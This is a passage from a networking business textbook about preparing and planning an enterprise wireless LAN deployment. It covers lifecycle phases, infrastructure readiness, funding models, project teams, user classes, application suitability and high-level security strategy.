within the organization. The strategic, operational, financial, and technological impact of WLANs on the
value-creation process of your organization was touched upon, as were the benefits and constraints of
wireless compared to wired solutions.
This chapter also covered the process of performing a thorough cost-justification analysis. Parameters
such as TCO and benefits that can readily be quantified were discussed. Furthermore, intangible benefits
that are related to the strategic impact of WLANs were revealed. Finally, risks associated with WLANs
were clarified to ensure an exhaustive business case.
Finally, this chapter explained the standard methods for consolidating the cash flows of the identified
costs and benefits into metrics that are meaningful to decision makers and stakeholders. The
construction of the ROI, payback period, NPV, and IRR was further explained as were the pros and cons
associated with each metric.
Armed with this knowledge, you are well positioned to tackle the next phase in constructing your WLAN
business case. These phases consist of determining the specific WLAN design for your organization and
strategies for effectively implementing and operating them. These are the topics of the next chapters.
Chapter 3. Preparation and Planning
Chapter 1, "Introduction to Wireless LAN Technologies," introduced you to the high-level technological
concepts of WLAN solutions. Chapter 2, "Business Considerations," focused on the strategic and financial
business considerations when evaluating WLAN solutions for your institution. This chapter focuses on
further aspects of preparation and planning considerations that are critical for successfully leveraging
your enterprise WLAN. It also provides a structured approach for your deployment, highlighting areas
that require preparatory work, because you need to identify management and technical dependencies
that are unique to your circumstances.
This chapter adopts a "60,000-foot view" of the challenges ahead and asks you to answer some key
questions on technical, financial, and program management issues. The chapter also introduces such
topics as strategic preparation and planning, architectural considerations, and program management.
Upon completion, you will be prepared to describe in strategic terms where you will deploy, how you will
deploy, how you will fund and manage your deployment.
Solutions Lifecycle
The lifecycle of your WLAN project can be broken down into discrete yet related phases. This is known as
your solutions lifecycle. The phases are preparing, planning, designing the architecture, implementing
the solution, operating the infrastructure, and finally optimizing the system (PPDIOO). Note that this is
not a linear but rather a circular process. Lessons learned and best practices are essential for a better,
faster, and more cost-effective design. They can be used to continuously develop and perfect the final
solution. Figure 3-1 illustrates the PPDIOO lifecycle.
Figure 3-1. PPDIOO Solutions Lifecycle
Ultimately, the goal of technology investments is to maximize the business's benefit while
simultaneously minimizing both the technology's and project's risk. A sound business case and positive
Net Present Value (NPV) for your WLAN project alone are not sufficient to ensure that you accrue the full
benefits from your WLAN. Indeed, identifying, qualifying, and quantifying the business drivers are only
the first steps in turning your vision into reality. Proper preparation, planning, and execution are vital to
getting the solution deployed.
Typically, preparation includes such aspects as identifying the business case and requirements, defining
the enterprise's wireless strategy, working on return on investment (ROI). Preparing your WLAN
deployment also means examining the current enterprise business and network infrastructure, defining a
funding model, and then deciding the breadth and scope of your deployment.
Planning is the "opening" step in the project proper, where you create your project teams and have your
first planning kickoff meeting. You also identify your key resources and detail your high-level project
plan or schedule. Of course, each enterprise and each deployment is unique, and the solutions lifecycle
should be considered simply as a tool to help tailor and manage the WLAN project to your needs. This
chapter takes you through the most common steps in the preparation and planning stages.
There is simply no single "best approach." There are no standard, canned answers or solutions to the
questions that are covered in this chapter. However, by providing a structured methodology for tackling
the challenges at hand, the solutions that are specific and relevant to your organization will more readily
present themselves.
Preparation
The preparation phase of your deployment is a critical initial step. Careful consideration of the issues at
this early stage will greatly increase the probability of a smooth and successful deployment. The primary
task associated with the preparation phase of the PPDIOO solution lifecycle is identifying and validating
the business case. This was covered in detail in Chapter 2. Additional factors that require attention when
you prepare your WLAN deployment include defining the breadth and scope of the WLAN and deciding
how you will fund the project.
Generic solutions typically produce average results. By considering the topics defined in this section, you
can proceed in a prepared manner with your goals and constraints clearly defined and understood.
After you have defined your goal, you can carefully prepare your deployment plans. In Chapter 2, you
effectively considered why a WLAN might be a good investment for your enterprise network. This
chapter focuses on what you need to consider when planning a WLAN and how you will deploy it. It is all
about understanding and addressing the larger context in which the project takes place. As such, the
key factors that need to be considered include but are not limited to the following:
Breadth and scope of the deployment, including
- Deployment scope
- Infrastructure readiness
- Environmental considerations
- Regulatory requirements or restrictions
Deployment funding strategies, including
- Centrally funded
- Group funded
- Client funded
- Subscription funded
By clearly identifying and defining your position on these issues, you will provide a more targeted
solution, avoid scope creep, achieve swifter deployment, and preempt many potential problems. Indeed,
many technology deployments fail because the planner or business decision maker failed to identify and
subsequently preemptively address these fundamental challenges.
The next sections examine each of these key factors in turn.
Breadth and Scope of Deployment

One of the first sets of decisions you should make when preparing to deploy an enterprise-class wireless
LAN relates to the breadth and scope of the deployment. You need to decide where you are going to
deploy, whether your existing infrastructure is ready to support the WLAN, and what local and
environmental regulations you must address.
Deployment Scope
You need to determine how large a footprint you want your WLAN to have. The business rationale you
identify (as described in Chapter 2) will certainly assist you in this process. However, it is strongly
recommended that you document as accurately as possible the breadth and scope of your deployment.
Doing so ensures that you avoid installing the WLAN in areas where it is unnecessary or would provide
limited benefits, and conversely ensures that you cover all areas in which WLAN connectivity is both
required and beneficial to your organization. You may wish to identify early on whether there are specific
business considerations with regards to where you will deploy. Options for deployment include the
following:
All office environments
HQ building only
Small/medium satellite offices
New offices only
Greenfield site
Draw up a list of all buildings/sites/floors where you want to deploy independently of the business driver
(secondary network, complimentary network, and so on). This will also assist you in your budget and
project planning, help you to create a prioritized deployment list, and help you to identify possible pilot
sites.
Infrastructure Readiness
A key focal point should be the infrastructure requirements that a WLAN deployment presents. To assist
you in this endeavor, you must consider typical network architecture models. Most large-scale networks
are built on a hierarchical model. Typically, there are three "layers" to these networks, as shown in Table
3-1.
Table 3-1. Hierarchical Network Layers
Layer
Explanation
Core
Provides fast links between sites or campus locations. Focus is high-speed

switching and routing of data. The core layer is typically the organization's widearea network (WAN) that links each site or campus.
Distribution
The distribution layer functions as an aggregation point and conventionally

provides higher-level, more intelligent network services such as security policies,
traffic shaping, content routing, and so on. The distribution layer typically links
buildings or sites on one campus. It should be noted that in some small to
medium organizations, the core and distribution layers are collapsed into one.
Access/Edge
The access or edge layer provides network connectivity to your users or

workgroups. The network ports into which PCs, servers, printers, and so on are
connected form the "entry points" into the access layer.
Figure 3-2 illustrates the network layers.
Figure 3-2. Hierarchical Network Model

In a typical wired network, your users connect via the access layer switches, which are sometimes
known as workgroup switches. In a WLAN, however, your users connect to the network via the wireless
access points. Access points are considered edge devices, and they lie within the access layer, as you
can see in Figure 3-3.
Figure 3-3. Access Layer
Note
Don't confuse the terms "access layer" and "access points." The access layer is a conceptual
term used to describe the edge devices that provide connectivity to your end users and
workstations. Access points are the physical devices that provide wireless connectivity. They
are analogous to workgroup switches. Access points and workgroup switches are considered to
lie within the access layer, because they are "edge devices" that provide entry into the
network.
These concepts are important because when you deploy a WLAN, you are adding devices into your
access layer and connecting them directly to your workgroup switches. Therefore, you must ensure that
your workgroup switches have sufficient capacity for these access points. Typically they require a
network port, power, and console access.
Connectivity
Because each access point requires an Ethernet port for connectivity, you must ensure that your network
switches have sufficient port capacity to attach the AP to the rest of the network. Typically, this does not
pose a problem in greenfield deployments. Deploying your WLAN in an established or mature networking
environment, this becomes a significant consideration to address. Otherwise, you would have to budget
accordingly for additional equipment. In addition, you should ensure that your Ethernet switches support
at least 100BASE-T, as all the current WLAN standards (802.11a, 802.11b, and 802.11g) provide an
aggregate nominal throughput of between 11 Mbps and 54 Mbps. Finally, you will have to ensure that
the access point locations are within the cabling distance limit for the employed LAN technology. For
example, the maximum transmission distance for 100BASE-T is 100 meters.
In summary, to ensure that your access points can establish connectivity, answer the following
questions:
Do you have sufficient Ethernet ports, or do you require additional switches?
Do your switches provide 100BASE-T or higher?
Is the cabling distance within defined limits?
Power
Electronic equipment requires electrical power. Generally speaking, you can power access points in two
ways:
Directly from AC mains power where the access points are located
By providing power over the Ethernet cable
Powering the access points via AC is straightforward but requires that you provide AC outlets in the
vicinity of the access point. This is often an expensive exercise that requires the use of certified electrical
engineers, which can add significant cost and delays to your projects.
Powering the access points via the Ethernet cables is achieved via Power over Ethernet (PoE). This
technology has been standardized as IEEE 802.1af and employs a previously unused pair of wires in
category 5 (or better) cables to provide power to a device. PoE is popular because it avoids the need to
install expensive additional power cables at each location and helps reduce costs.
When determining your power requirements, answer the following questions:
Do you wish to use PoE?
Do your existing Ethernet switches support PoE?
If your existing Ethernet switches do not support PoE, do you want to upgrade your switches or use
alternative power injectors instead?
Console Access
Many enterprises provide console access, also known as out of band management, to their network
equipment for support and management purposes. You should account for providing console-port access
if required or desired. Note that not all access points support console access. If this is a requirement or
standard for your organization, you should ensure that the access point make and model under
consideration supports console access, and that your wired infrastructure has sufficient capacity to
provide it.
When planning your WLAN, answer the following questions:
Do you wish to provide console access?

Do you have sufficient console server ports?
Are your console servers within cabling limits?
Many enterprises decide to physically locate the access points in the interstitial space between the ceiling
tiles and roof. This plenum area has strict fire regulations associated with it in most countries. In the
United States, for example, all equipment and cabling installed in the plenum space must be "plenumrated," a term denoting that it is fire-resistant.
Certain environments have stringent controls on what electrical equipment can be deployed in other
areas. Examples include government or military installations, hazardous environments (mining,
petroleum, gas, mineral exploitation, and so on), certain manufacturing locations (munitions, "cleanroom" environments, and so on), and many healthcare-related buildings or campuses. In these
circumstances, the electrical equipment must be deemed "intrinsically safe," a term denoting that the
equipment does not create electrical interference or even very small electromagnetic discharges. Most
electrical equipment, including access points, is not "intrinsically safe" and can therefore create very
small electromagnetic discharges or interference. To address these stringent environmental controls,
access points can be installed in special shielding containers. In the United States, these are called
National Electrical Manufacturers Association (NEMA) enclosures. (Further information on NEMA and
NEMA enclosures can be found at http://www.nema.org/prod/be/enclosures/.)
In the United States, there are also national health and safety regulations to be considered, and local
and national building standards. It is important for you to follow due diligence on potential environment
or safety standard issues that are specific to your organization's context. Be sure to investigate and
understand your obligations and ensure that your equipment complies with all relevant standards. The
use of an experienced or professional deployment team will help in this area. Enterprises that work in
such environments or that have equipment sensitive to environmental factors often have a safety or
standards officer who can approve any wireless LAN installations or at least provide guidance. Ensure
that they are represented in the project.
Safety and standards compliance are not the only environmental topics that can impact your planning
phase. Simple issues such as ruggedness or waterproofing might also need to be considered. This is
especially the case when you might be deploying wireless access points outdoors (in a university
campus, for example).
Regulatory Restrictions or Requirements

As mentioned in Chapter 1, the regulations that apply to the use of 2.4-GHz and 5-GHz frequency
ranges are not the same all over the world. At this stage, it is sufficient to note that you must take local
and national regulations into account and plan accordingly. This is especially important if you are
considering a large, transnational or global deployment because you might need to purchase different
models for different countries.
Deployment Funding Strategies
There are many funding strategies for deploying wireless in an organization, including the following:
Centrally funded
Group funded
Client funded
Subscription funded
This section describes these common strategies along with their advantages and disadvantages. You
learn more about funding strategies in Chapter 6, "Wireless LAN Deployment Considerations."
Centrally Funded Deployment

Centrally funded is perhaps the most common funding strategy. The entire cost is absorbed by a single
entity; this can be the IT department, Finance, or the group responsible for business operations. In most
small to medium deployments, this is the only model used.
Advantages of centrally funded deployment include
Full visibility of program cost
Ease of management
Simplified cost and budgetary control
Disadvantages of centrally funded deployment include
Requires entire project to be funded up front
Requires careful monitoring and sometimes dedicated finance staff
Group-Funded Deployment
Group-funded deployment strategies are those where a division, department, or sometimes regional
section of an enterprise funds the deployment from its own budget. It either engages external
professional consultants to design and deploy the solution or uses the organization's existing IT
department in a "professional services" model.
Advantages of group-funded deployment include the following:
Ensures that each group/division funds its own deployment
Tends to encourage financial prudence on the part of groups requesting WLAN services
Avoids "rogue deployments" where groups self-fund and manage their own solution
Disadvantages of group-funded deployment include the following:

Is more complex than centrally funded model
Requires each group/division to control its own budget
Requires each group/division to manage its own program cost
Can sometimes result in different groups funding competing solutions
Does not necessarily require each group/division to follow corporate or organizational standards
Client-Funded Deployment
A client-funded strategy is simply one whereby the IT department of the enterprise is responsible for
installing and managing the deployment but utilizes a charge-back mechanism to the clients (usually
other departments or divisions) to fund the installation. This strategy is usually adopted with a clear
policy direction that ensures your IT department is the only group approved for deploying wireless
networks. This ensures that you maintain a consistent architecture, a standard design and scope of work
(equipment, manufacturer and model), wireless security standards, and a common support plan.
Furthermore, it prevents several different departments from proceeding with their own installations that
might not be compliant with your internal security and procurement policies.
Client-funded deployments are usually based upon an installation charge per AP or user, followed by an
ongoing support cost.
Advantages of client-funded deployment include
Ensures common architecture, standards, policies, and IT security strategy
Avoids "rogue deployments" where groups self-fund and manage their own solution
Helps control cost
Encourages financial prudence, because each group must fund deployment from its own budget
Disadvantages of client-funded deployment include
Is more complex to manage than centrally funded model
Requires each group/division to control its own budget
Requires each group/division to manage its own program cost
Tends to result in staggered deployments, or "patchy" WLAN coverage
Can cause user dissatisfaction when one group or area has WLAN coverage but others do not
Subscription-Funded Deployment
The subscription-based deployment strategy is also known as "pay as you go." In this model, the users
or user groups pay a service fee for wireless network access. The subscription model ensures that you
not only recover the costs associated with the service deployment but also recuperate ongoing support
and maintenance costs.
This model is less common in most standard enterprise deployments but popular in environments where
you have many different user types. Universities are a good example. The provision of wireless network
access can be considered an added value service that the student body pays for on a per-user or perclass basis.
Advantages of subscription-funded deployment include the following:
Ensures that ongoing support costs are recovered from end users/groups
Reduces unnecessary or under-utilized deployments
Disadvantages of subscription-funded deployment include the following:
Requires complex financial models and charge-back mechanisms
Tends to limit breadth of deployment to those who can spare budget
Planning
This section addresses the planning phase of your deployment.
Note
However, this book is not a project management guide. Many large enterprises already have
an official project lifecycle or have adopted one of the national or international standards such
as PRINCEII (http://www.ogc.gov.uk/prince2/), BS6079 (http://www.bsiglobal.com/index.xalter), or Project Management Institute (PMI) Project Management Body of
Knowledge (PMBOK)(www.pmi.org).
If your enterprise or organization has a predefined project lifecycle or methodology, follow it. However,
for those organizations that do not have a formal project methodology, and even for those that have
standards in place, this section makes some general recommendations.
We recommend that you address, at a very minimum, the following key elements of your project:
Identify and obtain buy-in from the project stakeholders. These can include
- Project sponsor
- Project board
- Program team
- Program manager
- Project tracks
Segment and classify the WLAN user community. User considerations include
- User classes
- Primary users
- Secondary users
- Other users
Determine the impact on the application portfolio. Deliberations should include

- The main or typical application base you want to use on the WLAN
- Application characteristics
- The portability of the application portfolio and usage pattern to a WLAN environment
Develop a scalable architecture that addresses the following:
- The architecture's ability to grow easily to support additional users and groups
- Single points of failure
- Common architecture that can be replicated easily across all sites
Define your security strategy that, at a minimum, addresses
- Treating the wireless network as "trusted" or "untrusted"
- Using wireless security policies
- Dealing with rogue access points
Construct a high-level program plan. We recommend that you
- Estimate resource requirements
- Estimate budgetary requirements
- Produce project/program plan
- Follow your internal project lifecycle
Note
The goal is to assist you in defining your business case, to prepare and plan your deployment,
and to provide guidance on how to implement, manage, secure, and optimize your WLAN.
If you are unfamiliar with standard project management methodologies and project lifecycles,
we highly recommend you engage or appoint a professional or dedicated project manager to
assist you in your deployment.
Project Stakeholders
An important step is to clearly document the project sponsor and stakeholders and how they shall
manage and monitor the project. This helps put in place a clear reporting chain and follows established
business processes and project methodologies in most large enterprises.
Project Sponsor
Before you commence, you need a project sponsor. This is usually a senior executive within the
organization who either has made the decision to proceed with the deployment or has had the program
assigned to him. The project sponsor is by definition a stakeholder who sits on the project board (if one
exists).
Project Board
The project board is a committee made up of senior department or group heads that have a vested
interest in the program's success. Along with the sponsor, these individuals are sometimes also known
as stakeholders. They can include the likes of Finance Director/CFO, IT Director/CIO, Business
Operations Manager, and so on. The project stakeholders usually also include a representative of the end
users and senior members of the IT department. The project stakeholders/project board should meet
regularly to monitor the progress of the program, note deviances, and agree on remediation if
necessary.
Program Team
After you have identified your project sponsor and formulated a list of stakeholders, you need to create a
project or program team. In its Project Management Book of Knowledge (PMBOK), PMI defines a project
as "a temporary endeavor undertaken to create a unique product or service." A program is simply a
collection of interrelated projects. Whether your deployment is considered a project or a program really
depends upon its size. Most enterprise-class WLAN deployments are large enough to contain several
project tracks, which means that planning your deployment qualifies as a program. For smaller
deployments, simply collapse these steps into a single project.
Program Manager
A program and its team are usually led by a program manager. The program manager has ultimate
responsibility for fulfilling the program goals and managing the program's operations. He typically
reports to the stakeholders and sits on the project board. Program managers are responsible for
reporting on the program's progress and deviations and, most importantly, ensuring that each
constituent project is completed on time, on budget, and in accordance with the overall program plan.
Each project has a project manager responsible for its detailed management. Sometimes, especially on
smaller programs or where there are resourcing problems, the program manager may also act as a
project manager. All project managers usually also report to the program manager.
A program manager is critical to a successful delivery of your solution. Ideally, the program manager
should not only be someone who is familiar with wireless and/or networking technologies as this will
facilitate collaboration with the technical team but also be familiar with your organization.
Project Tracks
Most large programs are broken down into several projects or project tracks. Each project is usually
managed by a project manager. Table 3-2 shows examples of typical project tracks and their
responsibilities.
Table 3-2. Example Project Tracks

Project Track
Responsibility
Comment
Design team
Solutions architecture
The design team defines and designs the technical

architecture of your solution. This is probably the
most important track in the early stages of your
project.
Network operations
Ongoing
The network operations team includes those

responsible for the ongoing support and
maintenance of the wireless LAN infrastructure. In
some organizations, they are the same as the design
team.
Frontline support
Helpdesk, desktop
support
The frontline support team is the first point of

contact for your users. It is important to engage
your support organization during your program,
because any WLAN deployment will have an impact
upon your end users.
Finance
Project finance,
budgetary controls
The finance organization is responsible for managing

the project budget and ensuring financial prudence.
Its engagement can range from a finance
representative assigned responsibility for the project
all the way to a full team of corporate finance
analysts.
Information security
Security, standards,
and policy compliance
This team or individual is usually responsible for

defining the organization's security posture, policies,
and standards.
Workplace resources
Cabling, power,
Workplace resources is a term often used to describe
occupational health and the group responsible for workplace and
safety, and so on
environmental issues, such as cabling, power, and
OHS.
Vendor management
External vendor
engagement,
contracts, selection,
SLAs, and so on
Many large organizations have dedicated teams who

manage external vendors and third-party
contractors.
Note
This list is not exhaustive but simply indicative of several possible groups that should be
represented in the program team.
Users
It is important to understand your users so that you can ensure that your WLAN design satisfies their
requirements. One common approach is to categorize your users into different types or classes and then
identify your primary, secondary, and other user types.
User Classes
When considering your user base, it is helpful to define various classes of users who share common
attributes. These profiles are based on their typical requirements. This includes their primary
applications, degree of mobility, bandwidth and latency restrictions, level of security, and typical hours
of operation. Note that a user doesn't necessarily need to be an individual. It can also include printers,
servers, or automation equipment. It's also important to note that user classes should include
anticipated users/devices. Many WLAN deployments are based upon providing network connectivity for
users or devices that have not been implemented yet; wireless voice handsets are a prime example.
Identifying the various classes and their respective characteristics helps ensure that you design your
WLAN to meet their specific requirements. For example, standard users have different security
requirements from guest users.
The following sections and tables describe different types of users.
Standard User Class

The standard user class is the most common. It covers the common office user, generally outfitted with
a laptop or mobile data device (PDA, SmartPhone, and so on). The traffic created by this class is
typically identical to normal daily network traffic, and these users can happily coexist with other users in
that class within the same WLAN cell. Some standard class devices may require higher levels of
bandwidth, because they create streaming voice or video traffic.
[Pages 115 - 116]
Description
Standard network user/device in semi-fixed location
Characteristic
Typically has a fixed work location or desk

User or device may roam periodically
Description
Standard network user/device in semi-fixed location
Requirements
Access to the enterprise network and applications

User may roam periodically
Some standard user class devices may need high-bandwidth support
(wireless voice and video, for example)
Examples
Normal enterprise laptop user

Wireless printer
Wireless video camera
Robotic manufacturing device
Typical applications
Standard office productivity applications

Web browsing
E-mail, calendaring, and so on
Mobile User Class

The mobile user class covers those users in your organization who are on the move for the majority of
their time. They may have a desk and fixed telephone line, but mobility is key to completing their
primary job function. As such, they are often equipped with application-specific devices (ASDs), such as
asset tracking bar-code readers, PDAs, and standard laptops.
This class also includes devices and is not limited to individuals. For example, a mobile user class device
could include electric carts with an integral PDA/laptop such as those used in some airports.
Description
User/device that is constantly on the move within a single

location
Characteristic
Typically doesn't have a fixed work location or desk

This class is mobile across the office/campus environment
Requirements

Roaming from WLAN cell to cell required
Extensive (or even ubiquitous) coverage preferred
Examples
Doctor with PDA

University lecturer with laptop
Shipping clerk with bar-code reader
Desktop support engineer with PDA/laptop
Forklift truck with location-based services
Description
User/device that is constantly on the move within a single

location
Automated stock delivery cart with location/capacity sensors
Typical applications

Web browsing
E-mail and calendaring
Vertical applications (POS, telemetry, manufacturing services, and so
on)
Roaming User Class

The roaming user class is typically limited to individuals (not devices) who are constantly on the move,
not only within one location or office, but across multiple locations. This class is also known as road
warriors. In many regards they are similar to the mobile user class, with the added requirements of
seamless access or "common user experience" at any location.
Description
User who regularly moves from location to location (office or campus)
Characteristic
Typically has no fixed location and can "appear" at any office

Roaming user types are most likely individuals (not devices)
Requirements

Consistent network architecture from location to location
Support for authentication across locations
Examples
Road warrior user who moves from office to office

Traveling salesperson
Typical
applications

Web browsing
Hot-Desk User Class

The hot-desk user class is becoming more common. This class covers users and devices that move from
location to location periodically either on a day-to-day basis or throughout the day. Similar to the
standard user class, in that they typically require access to everyday network resources, their defining
characteristic is that they might remain static for a short period but subsequently move on to another
location later. This class includes students in educational organizations and devices such as the mobile
check-in desks found in many airports or convention centers.
Description
User who arrives to work each day and chooses a different work location
or desk each time
Characteristic
Typically doesn't have a fixed work location or desk; however, this user type
tends to be limited to one deployment area (that is, office or campus
environment)
Requirements
Can access the enterprise network and applications

May require secure or segmented access to the Internet
May require separate authentication mechanism to standard user class
Examples
Call center employee

Student
Typical applications Standard office productivity applications

Web browsing
Educational database applications
Call center management applications
Guest User Class

The guest user class covers the users (rarely devices) that require sporadic network access. Usually they
require Internet access only, and their access is typically limited to thatthat is, they are not provided
with enterprise network connectivity. Many corporations now provide guest wireless access to visitors or
temporary users such as contractors or conference attendees. Access is often controlled or monitored
and may require the user to accept legal and acceptable usage policies. In-room Internet access for
hotel guests is a prime example of the guest user class.
Description
Guest users
Characteristic
Not a member of the organization
Requirements
Can usually access the Internet

May require authentication or access control
May have access limited by throughput and/or time of day
May not support all applications
Typically may use VPN for access to their own network (and may therefore
require certain security configuration on your network)
Examples
Temporary contractors
Visitors to your enterprise to whom you wish to provide Internet access
"Customers" at Internet cafes
Description
Guest users
Hotel and airport visitors
Typical applications Web browsing

VPN connectivity to remote or "home" networks
Note that these classifications are not necessarily standard across the industry. These should be
considered general descriptive terms. Some companies may not have hot-desk users or may consider
them identical to mobile users. Additionally, your organization may include many different user types,
but the WLAN is aimed at providing wireless access to only some of them. For example, a university may
choose to deploy a wireless network for its security staff (mobile users) but not its student body (hotdesk users). By clearly identifying the types of users in your organization, you can more easily design a
network to address your specific goals. These can include providing network access to them all or only to
a limited subset of them.
After you have classified your user types, you can proceed with identifying your primary, secondary, and
even your tertiary users.
Primary Users
After you identify the user classes within your organization, you should clearly define who the primary
target audience is for the WLAN. You may have defined several different classes of users but aim to
provide wireless access to only one class. This will have an effect on the breadth and scope of your
deployment, the architecture, and the cost.
Secondary Users
Secondary users are those who can use the mobility, productivity, and connectivity benefits of the
WLAN, even though they were not the primary target. An example could be mobile workers in a
manufacturing environment, where wireless was originally installed to provide connectivity to factory
equipment.
Other Users
Some organizations may choose to provide wireless access to guest users as an incidental benefit or
amenity. Although it may not have been a specific project goal or success criterion, fringe benefits can
be realized by extending the availability of your WLAN to irregular users.
Impact on Application Portfolio

Wireless networks are slower than conventional wired networks. Today's wired networks typically
provide 100 Mbps to 1000 Mbps of dedicated bandwidth per connection. Conversely, today's fastest
WLANs offer only up to (and often less than) 54 Mbps that is typically shared among several users.
However, as mentioned in Chapter 1, the value of WLANs is not based on speed, but on mobility. As the
business decision maker, you must consider the impacts of wireless networks on your existing
applications. Most applications will work well, and your workforce will benefit from the added mobility
provided by wireless network access. Yet there may be some applications that are so sensitive to
bandwidth limitations and lag that their performance is adversely impacted. Remember, a WLAN is a
"shared medium" unlike the typical switched wired network. All the users in a particular cell must share
the bandwidth, and as such, the amount of bandwidth available to individual users is considerably less
than that provided by a wired LAN. Furthermore, the more users there are per cell, the less bandwidth
that is available to each user. As such, some applications might not work satisfactorily on your wireless
network.
An application matrix will help you decide which applications are suitable for wireless networking. A
simple five-step process will help you categorize your applications and avoid such an outcome:
Step 1.
Identify your applications.
Step 2.
Identify application bandwidth requirements.
Step 3.
Identify sensitive applications.
Step 4.
Consider application/location
interdependencies.
Step 5.
Produce wireless application matrix.
The following sections describe additional points to consider when determining the impact of wireless on
your application portfolio.
The Main Application Base You Want to Use on the WLAN

Applications can be grouped into generic categories as follows:
Standard business applications Internet, e-mail, calendaring, word processing, spreadsheets,
and so on.
Vertical "low bandwidth" applications Point of Sale (POS), telemetry, bar-code readers, and so
on.
Vertical "high bandwidth" applications Manufacturing, engineering, CAD/CAM, medical
imaging, and so on.
Streaming applications Video and voice.
Database and business applications Enterprise Resource Planning (ERP), Customer Relationship
Management (CRM), supply chain management, and so on.
This list is not exhaustive, but it is indicative of the application types. Careful consideration is required
regarding the application specific characteristics, as well as the environment to which the applications
are to be extended by means of WLANs. These considerations are discussed next.
Application Characteristics
Identifying the characteristics, such as bandwidth required by each application or application mix, is
important. Some applications may require consistent or sustained amounts of high bandwidth. If you
choose to deploy a WLAN in conjunction with wireless voice services, for example, you must consider the
minimum amount of bandwidth required by your voice application. Wireless video cameras are also
typical of applications that require a significant or dedicated amount of bandwidth and minimal jitter.
Next, identify which applications are susceptible to the characteristics of wireless LANs. Some
applications may be susceptible to the "lag" introduced into WLANs when the user roams from cell to
cell, for example. This can sometimes add several hundred milliseconds of lag to a session. Most
applications can tolerate minor network-related issues like this, but some (including wireless voice, for
example) will be negatively impacted.
The Portability of the Application Portfolio and Usage Pattern to a WLAN Environment
Consider the physical location of users and the mix of applications they use. If you expect a high number
of users accessing high-bandwidth applications at the same time in the same location, you may
experience potential problems. For example, if you wish to share your WLAN between normal office
applications and wireless voice, you may find that you experience voice quality problems if too many
data users are "online" at once. You can address this issue with careful radio cell design or with the use
of the higher-bandwidth WLAN standards (802.11g and 802.11a). Additionally, you may wish to put
limits on the size of your cells to ensure that each user can get enough bandwidth.
The use of wireless quality of service (QoS) controls should not be overlooked. Several equipment
manufacturers have implemented their own proprietary QoS features (that usually only work with their
own equipment and client devices), or you may opt for solutions like that offered by the Cisco Client
Extensions (CCX) program, which though proprietary is open for adoption by any manufacturer. Finally,
there is the WiFi Multimedia (WMM) standard defined by the WiFi Alliance.
Once you have completed this analysis, you can categorize your applications into a sliding scale or
application matrix. At one end will be the normal applications that work very well on a wireless network;
effectively, they are network agnostic. At the other end will be applications that are not suitable for
wireless users. Based upon this categorization, you can flag certain applications as unsuitable or not
recommended for wireless use. This will ensure that your support organization and user base are fully
informed.
Table 3-3 shows a sample application matrix. In this example, certain policy decisions are represented,
such as the decision not to support Internet traffic on the WLAN. In your deployment, the entries in the
application matrix will be different.
Table 3-3. Sample Application Matrix
Application /
Service
User Class
Office applications
Bandwidth
Sensitive?
Lag
Sensitive?
Wireless
Supported
Suitability? on Wireless?
Primary, Secondary No
No
Yes
Yes
E-mail
Primary,
No
Secondary, Tertiary
No
Yes
Yes
Wireless video
cameras
Primary
No
Yes
Possible[1]
Web browsing
Primary,
No
Secondary, Tertiary
No
Yes
Yes
Calendaring
Primary, Secondary No
No
Yes
Yes
HR database
application
Primary
Yes
Yes
No
No
ERP database
application
Primary
No
Yes
No
Possible[2]
Wireless Internet
traffic
Secondary
No
No
Yes
No[3]
Yes
[1]
The wireless video cameras will function perfectly on the WLAN but may use a high amount of bandwidth per cell. The design team
will be advised to limit the number of cameras per cell.
[2]
Some configuration may be required on the back end of the ERP database applications to ensure that they are no longer susceptible
to lag of greater than 500 ms.
[3]
The project team has been asked to specifically prohibit wireless Internet access for the student body (hot-desk user classsecondary
users).
Scalable Architecture
In most enterprise environments, it is important that you design your architecture such that it scales in
both capacity and capabilities to meet future requirements. Rip-and-replace should be avoided as much
as possible due to its excessive organizational and financial burden. Take architectural scalability into
account early on. Avoid designs that will not scale across your entire organization or that require
excessive operational and support overheads.
Architecture's Ability to Grow Easily to Support Additional Users and Groups

Endeavor to design the network such that it can expand easily, either within a single location or across
multiple locations. Sometimes this will mean working carefully with the business leaders to align with
corporate strategies and forecasted growth, in addition to considering technical requirements. If your
enterprise is planning on growing at 10 percent per annum over the next five years, it would be rash to
design and implement a WLAN that can only support the current number of users. Avoid nonrepeatable
design characteristics.
Single Points of Failure

Designs that have single points of failure are typically not considered scalable. For example, if your
organization has offices spread across the globe, it is important that you do not architect your WLAN so
that all traffic must flow to a central location or single authentication, authorization, and accounting
(AAA) server. A design that relies upon a single AAA server is not scalable, especially if you might
expand your WLAN to multiple sites in different countries.
Common Architecture That Replicates Easily Across All Sites

Ensure that the architecture is common for all sites if possible. You want to avoid having individual
designs for every site in a large deployment. Standardize as much as possible, ensuring that the WLAN
design is the same in different buildings or sites. Avoid using obsolescent equipment or components that
are hard to source or restricted in certain countries. For example, if you are undertaking a global
deployment, you may wish to ensure that the design can be implemented in Europe, Asia, and the
United States.
Security Strategy
In today's internetworking world, it is always important to think securely. This is especially the case
when dealing with wireless networks due to their broadcast nature. Indeed, press reports on how
wireless networks are insecure and prone to hacking cause undue concerns in many organizations. This,
in turn, is known as the FUD factor (Fear, Uncertainty, Doubt). The simple fact is that wireless LANs can
be secured. The risk lies with WLANs that are not properly secured or those with poorly designed or
executed security frameworks.
Although you will learn more about security topics in Chapter 7, "Security and Wireless LANs," you
should consider security from the very beginning. Careful consideration is required regarding the
application-specific characteristics, as well as the environment to which the applications are to be
extended by means of WLANs. These considerations are discussed next. Many organizations have
information security departments tasked with addressing such topics specifically. However, security is
not the responsibility of the IT security team alone. Security standards and policies are also the
responsibility of the project implementation team, network engineers, and even business leaders. It may
not be possible to finalize a strategy now. Your goals may become clearer as you architect your WLAN or
perhaps after you analyze a pilot deployment. However, simply considering these issues during the
planning phase may help you highlight the "gaps" in your current security posture and assist you in
defining new policies and guidelines.
Treating the Wireless Network as Trusted or Untrusted

At a high level, there are basically two different schools of thought on how to deal with wireless LAN
security. Either the WLAN is trusted, or it is not. The decision on whether your WLAN will be trusted or
untrusted will have a significant impact upon your architecture and technical design.
A trusted WLAN is treated as simply another transport medium and is fully integrated into existing
network. Security is provided by robust authentication and encryption features provided by the wireless
security standards and the equipment manufacturer.

An untrusted WLAN is segmented from the core enterprise network as it is considered to be an external
network. The WLAN is effectively an extranet. As such, the access points are behind firewalls, and
security is provided with the same solutions as for providing remote access to the organization's
intranet. A virtual private network (VPN) overlay is a common mechanism for providing secure
connectivity in this environment.
Considering Wireless Security Policies

Clear and well-defined WLAN security policies will not only facilitate communication with the user
